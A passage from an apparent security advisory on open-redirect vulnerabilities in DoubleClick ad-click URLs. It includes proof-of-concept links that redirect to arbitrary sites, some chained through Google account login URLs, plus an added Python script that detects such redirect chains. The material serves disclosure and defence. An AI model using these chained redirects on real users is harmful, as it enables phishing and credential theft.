<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.2.2)</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Mitechmate published a blog post related to DoubleClick.net spam in 2014.</span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"<a href="http://ad.doubleclick.net/" target="_blank">Ad.doubleclick.net</a> is recognized as a perilous adware application that causes unwanted redirections when surfing on the certain webpages. Actually it is another browser hijacker that aims to distribute frauds to make money. Commonly people pick up Ad.doubleclick virus when download softwares, browse porn site or read spam email attachments. It enters into computer sneakily after using computer insecurely. Ad.<wbr></wbr>doubleclick.net is not just annoying, this malware traces users’ personal information, which would be utilized for cyber criminal."</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://blog.mitechmate.com/remove-ad-doubleclick-net-redirect-virus/" style="background-color: white;" target="_blank">http://blog.mitechmate.com/<wbr></wbr>remove-ad-doubleclick-net-<wbr></wbr>redirect-virus/</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.2.3)</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Malwarebytes posted a news item related to DoubleClick.net malvertising in 2014.</span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"Large malvertising campaign under way involving DoubleClick and Zedo"</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/" style="background-color: white;" target="_blank">https://blog.malwarebytes.org/<wbr></wbr>malvertising-2/2014/09/large-<wbr></wbr>malvertising-campaign-under-<wbr></wbr>way-involving-doubleclick-and-<wbr></wbr>zedo/</a></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2) DoubleClick.net System URL Redirection Vulnerabilities Details.</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be exploited without user login. Tests were performed on Microsoft IE (10.0.9200.16750) on Windows 8, Mozilla Firefox (34.0) and Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) on Ubuntu (14.04), and Apple Safari 6.1.6 on Mac OS X Lion 10.7.</span></span><br />
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;">The following webpage was used for the tests: "</span><a href="http://securitypost.tumblr.com/">http://securitypost.tumblr.com/</a>". We can suppose that this webpage is malicious.</span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.1) Vulnerable URLs Related to Googleads.g.Doubleclick.net<wbr></wbr>.</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.1.1)</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;">Some URLs belonging to googleads.g.doubleclick.net are vulnerable to Open Redirect attacks, while Google prevents similar URL redirection on domains other than googleads.g.doubleclick.net.</span></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URLs:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.sharp-world.com/igzo" style="background-color: white;" target="_blank">http://googleads.g.<wbr></wbr>doubleclick.net/aclk?sa=L&ai=<wbr></wbr>CWEQH6Q73UqW9CMvMigfdiIGoB9rlk<wbr></wbr>sIEAAAQASAAUO7kr-b8_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEggFP0<wbr></wbr>E-9agyjXkIfjOxmtpPE76hNCBn1in_<wbr></wbr>meKMn53O-<wbr></wbr>8ZFlbxWDgYdaVZQKJza8mIRXw22hWI<wbr></wbr>VMAOJJzq-S6AipWHe9iVZCAAlcHj-<wbr></wbr>gT2B33tD9a2oQrZ61S3-WFh_<wbr></wbr>8T8RFUFnC_PRC35CTFbueQrUYjC-<wbr></wbr>j6ncVXzt_IPXugo5vE-3x4AQBoAYV&<wbr></wbr>num=0&sig=AOD64_<wbr></wbr>2petJH0A9Zjj45GN117ocBukiroA&<wbr></wbr>client=ca-pub-<wbr></wbr>0466582109566532&adurl=http://<wbr></wbr>www.sharp-world.com/igzo</a></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://economics.wj.com" style="background-color: white;" target="_blank">http://googleads.g.<wbr></wbr>doubleclick.net/aclk?sa=L&ai=<wbr></wbr>C-<wbr></wbr>RHnNvn2Uom8LeTaigfjkIHICfLQncc<wbr></wbr>EAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEhQFP0<wbr></wbr>LHofgVzg8U9Bvwu2_<wbr></wbr>hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6<wbr></wbr>QzMgNxx0_UawPG3-<wbr></wbr>UD097GLLCirbVMl2QxQqa04U3cp4YF<wbr></wbr>gV5dshYbzmqlVVfNn-<wbr></wbr>NuunzLNab6ATE5BUwQ9bgXBOW_<wbr></wbr>qEz8qgbwVOvUJrn1IzL-<wbr></wbr>ymANaKsQLZ9POlkbIe4AQBoAYV&<wbr></wbr>num=0&sig=AOD64_3a3m_P_<wbr></wbr>9GRVFc6UIGvnornMcLMoQ&client=<wbr></wbr>ca-pub-0466582109566532&adurl=<wbr></wbr>http://economics.wj.com</a></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://googleads.g.<wbr></wbr>doubleclick.net/aclk?sa=L&ai=<wbr></wbr>CWEQH6Q73UqW9CMvMigfdiIGoB9rlk<wbr></wbr>sIEAAAQASAAUO7kr-b8_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEggFP0<wbr></wbr>E-9agyjXkIfjOxmtpPE76hNCBn1in_<wbr></wbr>meKMn53O-<wbr></wbr>8ZFlbxWDgYdaVZQKJza8mIRXw22hWI<wbr></wbr>VMAOJJzq-S6AipWHe9iVZCAAlcHj-<wbr></wbr>gT2B33tD9a2oQrZ61S3-WFh_<wbr></wbr>8T8RFUFnC_PRC35CTFbueQrUYjC-<wbr></wbr>j6ncVXzt_IPXugo5vE-3x4AQBoAYV&<wbr></wbr>num=0&sig=AOD64_<wbr></wbr>2petJH0A9Zjj45GN117ocBukiroA&<wbr></wbr>client=ca-pub-<wbr></wbr>0466582109566532&adurl=http://<wbr></wbr>www.tetraph.com/security</a></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security" style="background-color: white;" target="_blank">http://googleads.g.<wbr></wbr>doubleclick.net/aclk?sa=L&ai=<wbr></wbr>C-<wbr></wbr>RHnNvn2Uom8LeTaigfjkIHICfLQncc<wbr></wbr>EAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEhQFP0<wbr></wbr>LHofgVzg8U9Bvwu2_<wbr></wbr>hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6<wbr></wbr>QzMgNxx0_UawPG3-<wbr></wbr>UD097GLLCirbVMl2QxQqa04U3cp4YF<wbr></wbr>gV5dshYbzmqlVVfNn-<wbr></wbr>NuunzLNab6ATE5BUwQ9bgXBOW_<wbr></wbr>qEz8qgbwVOvUJrn1IzL-<wbr></wbr>ymANaKsQLZ9POlkbIe4AQBoAYV&<wbr></wbr>num=0&sig=AOD64_3a3m_P_<wbr></wbr>9GRVFc6UIGvnornMcLMoQ&client=<wbr></wbr>ca-pub-0466582109566532&adurl=<wbr></wbr>http://www.tetraph.com/<wbr></wbr>security</a></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Attackers can make use of the following URLs to make the attacks more powerful, i.e.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.google.com/accounts/ServiceLogin?continue=https%3A%2F%2Fsites.google.com%2Fsite%2Fissrabhi%2Fhome&service=jotspot&passive=true&ul=1" style="background-color: white;" target="_blank">https://www.google.com/<wbr></wbr>accounts/ServiceLogin?<wbr></wbr>continue=https%3A%2F%2Fsites.<wbr></wbr>google.com%2Fsite%2Fissrabhi%<wbr></wbr>2Fhome&service=jotspot&<wbr></wbr>passive=true&ul=1</a></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http%3A%2F%2Fwww.orkut.com%2FRedirLogin%3Fmsg%3D1%26auth%3D*" style="background-color: white;" target="_blank">https://accounts.google.com/<wbr></wbr>accounts/SetSID?ssdc=1&sidt=*&<wbr></wbr>continue=http%3A%2F%2Fwww.<wbr></wbr>orkut.com%2FRedirLogin%3Fmsg%<wbr></wbr>3D1%26auth%3D*</a></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.google.com/accounts/ServiceLogin?continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fessaybeans%2Freflections%2Fsolitude.html" style="background-color: white;" target="_blank">https://www.google.com/<wbr></wbr>accounts/ServiceLogin?<wbr></wbr>continue=http%3A%2F%<wbr></wbr>2Fgoogleads.g.doubleclick.net%<wbr></wbr>2Faclk%3Fsa%3DL%26ai%<wbr></wbr>3DCtHoIVxn3UvjLOYGKiAeelIHIBfL<wbr></wbr>QnccEAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoE5AFP0<wbr></wbr>NHr5cHwFmWgKNs6HNTPVk7TWSV-<wbr></wbr>CDHX83dKdGSWJ2ADoZNIxUHZwjAODR<wbr></wbr>yDY_<wbr></wbr>7nVtpuqSLOTef4xzVxDQ2U22MNbGak<wbr></wbr>33Ur7i2jDB8LdYt9TbC3ifsXmklY5j<wbr></wbr>l3Zpq4_lP7wagVfjt0--<wbr></wbr>tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_<wbr></wbr>lPlnyGjlWzF8yn437iaxhGRwYLt_<wbr></wbr>CymifLO2YaJPkCm9nLpONtUM-<wbr></wbr>mstUSpKQrP2VjjaZkbDtuK0naLLBV3<wbr></wbr>7aYEY4TzWQi8fQGN47z4XgpinBCna9<wbr></wbr>1zQayZjn2wxccDCl0zgBAGgBhU%<wbr></wbr>26num%3D0%26sig%3DAOD64_<wbr></wbr>3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%<wbr></wbr>26client%3Dca-pub-<wbr></wbr>0466582109566532%26adurl%<wbr></wbr>3Dhttp%3A%2F%2Fwww.tetraph.<wbr></wbr>com%2Fessaybeans%<wbr></wbr>2Freflections%2Fsolitude.html</a></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.diebiyi.com%2Farticles" style="background-color: white;" target="_blank">https://accounts.google.com/<wbr></wbr>accounts/SetSID?ssdc=1&sidt=*&<wbr></wbr>continue=http%3A%2F%<wbr></wbr>2Fgoogleads.g.doubleclick.net%<wbr></wbr>2Faclk%3Fsa%3DL%26ai%<wbr></wbr>3DCtHoIVxn3UvjLOYGKiAeelIHIBfL<wbr></wbr>QnccEAAAQASAAUNTx5Pf4_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoE5AFP0<wbr></wbr>NHr5cHwFmWgKNs6HNTPVk7TWSV-<wbr></wbr>CDHX83dKdGSWJ2ADoZNIxUHZwjAODR<wbr></wbr>yDY_<wbr></wbr>7nVtpuqSLOTef4xzVxDQ2U22MNbGak<wbr></wbr>33Ur7i2jDB8LdYt9TbC3ifsXmklY5j<wbr></wbr>l3Zpq4_lP7wagVfjt0--<wbr></wbr>tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_<wbr></wbr>lPlnyGjlWzF8yn437iaxhGRwYLt_<wbr></wbr>CymifLO2YaJPkCm9nLpONtUM-<wbr></wbr>mstUSpKQrP2VjjaZkbDtuK0naLLBV3<wbr></wbr>7aYEY4TzWQi8fQGN47z4XgpinBCna9<wbr></wbr>1zQayZjn2wxccDCl0zgBAGgBhU%<wbr></wbr>26num%3D0%26sig%3DAOD64_<wbr></wbr>3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%<wbr></wbr>26client%3Dca-pub-<wbr></wbr>0466582109566532%26adurl%<wbr></wbr>3Dhttp%3A%2F%2Fwww.diebiyi.<wbr></wbr>com%2Farticles</a></span><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
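<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">The redirect targets in the URLs above travel in the adurl and continue parameters, or bare after a "?" in the ad.doubleclick.net click paths listed in section (2.2). The following Python is added here as an example and is not part of the original advisory: it unwraps such chains in proxy logs or mail links and flags any whose final host is off an allowlist. The sample URLs, placeholder tokens, .example hosts and function names are constructed assumptions.</span></div>

```python
import re
from urllib.parse import parse_qsl, quote, unquote, urlsplit

# Parameter names that carry the redirect target in the URLs quoted on this page.
REDIRECT_PARAMS = {"adurl", "continue"}
MAX_HOPS = 5  # stop unwrapping after this many nested targets
_BARE_TARGET = re.compile(r"\?(https?://.+)$", re.IGNORECASE)


def next_hop(url):
    """Return the absolute URL embedded in `url` as a redirect target, or None."""
    try:
        parts = urlsplit(url)
    except ValueError:  # malformed authority, e.g. a broken IPv6 literal
        return None
    # Named form: ...&adurl=http://target  or  ?continue=http%3A%2F%2Ftarget
    for name, value in parse_qsl(parts.query):
        if name.lower() in REDIRECT_PARAMS and value.lower().startswith(("http://", "https://")):
            return value
    # Bare form: /clk;...;b?http://target  or  /click;...;;%3fhttp://target
    tail = unquote(parts.path) + ("?" + parts.query if parts.query else "")
    match = _BARE_TARGET.search(tail)
    return match.group(1) if match else None


def redirect_chain(url):
    """Follow embedded targets offline (no network access) and return every hop."""
    chain = [url]
    while len(chain) <= MAX_HOPS:
        target = next_hop(chain[-1])
        if target is None:
            break
        chain.append(target)
    return chain


def _host(url):
    try:
        return urlsplit(url).hostname or ""
    except ValueError:
        return ""


def host_allowed(hostname, allowed_domains):
    """True if hostname equals an allowed domain or is a subdomain of one."""
    return any(hostname == d or hostname.endswith("." + d) for d in allowed_domains)


def assess(url, allowed_domains):
    """Describe the chain and flag it when a wrapped link lands off the allowlist."""
    chain = redirect_chain(url)
    hops = [_host(u) for u in chain]
    wrapped = len(chain) > 1
    return {
        "hops": hops,
        "final_url": chain[-1],
        "wrapped": wrapped,
        "flag": wrapped and not host_allowed(hops[-1], allowed_domains),
    }


# Constructed samples in the shapes quoted on this page; tokens and
# destinations are placeholders, not values from the advisory.
_INNER = ("http://googleads.g.doubleclick.net/aclk?sa=L&ai=PLACEHOLDER&num=0"
          "&sig=PLACEHOLDER&client=ca-pub-0000000000000000"
          "&adurl=http://landing.example/page")
SAMPLES = {
    "adurl": _INNER,
    "chained": "https://www.google.com/accounts/ServiceLogin?continue=" + quote(_INNER, safe=""),
    "bare": "http://ad.doubleclick.net/clk;000000000;000000000;b?http://landing.example/",
    "encoded": "http://ad.doubleclick.net/click;h=v2%7C0%7C0;000000000;0-0;;%3fhttp://landing.example/a",
    "plain": "http://news.example/article?id=7",
}

if __name__ == "__main__":
    allowed = {"news.example"}  # constructed allowlist of expected destinations
    for label, url in SAMPLES.items():
        result = assess(url, allowed)
        print(label, " -> ".join(result["hops"]), "FLAG" if result["flag"] else "ok")
```
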
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.1.2)</b></span></div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
</div>
<div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">By contrast, Google prevents similar URL redirection on domains other than googleads.g.doubleclick.net, e.g.</span></div>
<div class="">
<div class="im">
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://www.googleadservices.com/pagead/aclk?sa=L&ai=C8u9OibgEU_XIOKrNswfrzYDgAY2FhfgE1aLjnoYB-7qSCxADILhPKANQrt2khP3_____AWC_BaAB8-vV0gPIAQGqBChP0AshNp656okgv3tSxmgc3JZeuS25cM0HlW9wUqHwxL8nk75mFPqsgAf1k6otkAcB&num=3&val=ChA2MWI5ODZkYzA4MTlmZmRlEN-mlZgFGgghk-txLb-9bSABKAAwhPDs-dD_xPHhATj6w5KYBUD6w5KYBQ&sig=AOD64_2f3wWGlepm4KMYlixE15qmjC1FGw&adurl=http://freshservice.com/free-service-desk/" style="background-color: white;" target="_blank">http://www.googleadservices.<wbr></wbr>com/pagead/aclk?sa=L&ai=<wbr></wbr>C8u9OibgEU_<wbr></wbr>XIOKrNswfrzYDgAY2FhfgE1aLjnoYB<wbr></wbr>-7qSCxADILhPKANQrt2khP3_____<wbr></wbr>AWC_BaAB8-<wbr></wbr>vV0gPIAQGqBChP0AshNp656okgv3tS<wbr></wbr>xmgc3JZeuS25cM0HlW9wUqHwxL8nk7<wbr></wbr>5mFPqsgAf1k6otkAcB&num=3&val=<wbr></wbr>ChA2MWI5ODZkYzA4MTlmZmRlEN-<wbr></wbr>mlZgFGgghk-txLb-9bSABKAAwhPDs-<wbr></wbr>dD_xPHhATj6w5KYBUD6w5KYBQ&sig=<wbr></wbr>AOD64_<wbr></wbr>2f3wWGlepm4KMYlixE15qmjC1FGw&<wbr></wbr>adurl=http://freshservice.com/<wbr></wbr>free-service-desk/</a></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
